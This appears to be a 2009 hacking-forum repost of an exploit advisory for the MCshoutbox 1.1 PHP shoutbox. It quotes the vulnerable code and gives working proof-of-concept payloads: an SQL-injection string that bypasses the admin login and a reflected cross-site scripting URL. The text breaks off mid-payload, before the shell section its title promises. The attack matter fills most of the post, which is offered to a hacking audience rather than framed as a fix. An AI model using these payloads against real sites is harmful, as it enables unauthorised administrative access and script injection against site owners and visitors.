Multi Ethnic Hacking Group


    MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities

    Post by Foxi on Thu Jul 23, 2009 4:27 am

    Code:
    ###########################################################################################
    [+] MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities
    [+] Discovered By SirGod
    [+] http://insecurity-ro.org
    [+] http://h4cky0u.org
    ############################################################################################

    Homepage : http://www.maniacomputer.com/dload/MCshoutbox_Download_Page.html

    [+] SQL Injection Login Bypass

     - Note : magic_quotes_gpc = off

     - Vulnerable code in scr_login.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------
    $admin_name = trim($_REQUEST[ 'username' ]);
    $admin_password = trim($_REQUEST[ 'password' ]);
     connect($host,$username,$password,$database);
    $query = "SELECT * FROM admin_tbl WHERE admin_name = ''or''='' AND
    admin_password = ''or''=''" ;
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------

     - PoC

      URL : http://127.0.0.1/[path]/admin_login.php
      Username : 'or''='
      Password : 'or''='

    [+] Cross-Site scripting

     - Vulnerable code in admin_login.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------
    if(isset($loginerror)){ ?>
          <tr>
        <td colspan="2" align="center" style="font-size:18px;
    color:#FFFFFF;" ><?echo $loginerror?></td>
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------

     - PoC

        http://127.0.0.1/[path]/admin_login.php?loginerror=<script>alert(document

      Current date/time is Tue Jul 25, 2017 12:47 am